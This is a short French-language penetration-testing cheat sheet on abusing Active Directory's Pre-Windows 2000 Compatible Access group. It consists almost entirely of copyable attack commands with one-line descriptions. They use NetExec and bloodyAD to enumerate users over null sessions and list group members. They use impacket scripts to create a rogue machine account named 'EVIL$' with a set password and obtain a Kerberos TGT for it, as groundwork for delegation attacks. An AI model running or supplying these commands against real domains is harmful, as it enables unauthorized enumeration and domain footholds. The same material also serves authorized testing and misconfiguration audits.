Information Gathering

Pre-Windows 2000 Compatibility Abuse

Exploiter le groupe Pre-Windows 2000 pour une énumération en null session ou créer des comptes.

Copy command
nxc smb $DC -u $USER -p $PASS --groups | grep -i 'pre-windows'

Description: Vérifier la présence du groupe Pre-Windows 2000 Compatible Access et ses membres.

Copy command
nxc smb $DC -u '' -p '' --users

Description: Si le groupe Pre-Win2000 inclut 'Everyone', la null session liste les utilisateurs.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Pre-Windows 2000 Compatible Access'

Description: Lister les membres du groupe : 'Everyone' ou 'Authenticated Users' indique une mauvaise config.

Copy command
addcomputer.py -computer-name 'EVIL$' -computer-pass 'EvilPass123!' -dc-ip $DC $DOMAIN/$USER:$PASS

Description: Créer un compte machine (si MAQ > 0) : peut s'authentifier via Pre-Win2000 avec password vide.

Copy command
getTGT.py $DOMAIN/'EVIL$':EvilPass123!

Description: Obtenir un TGT pour le compte machine créé : base pour RBCD ou delegation.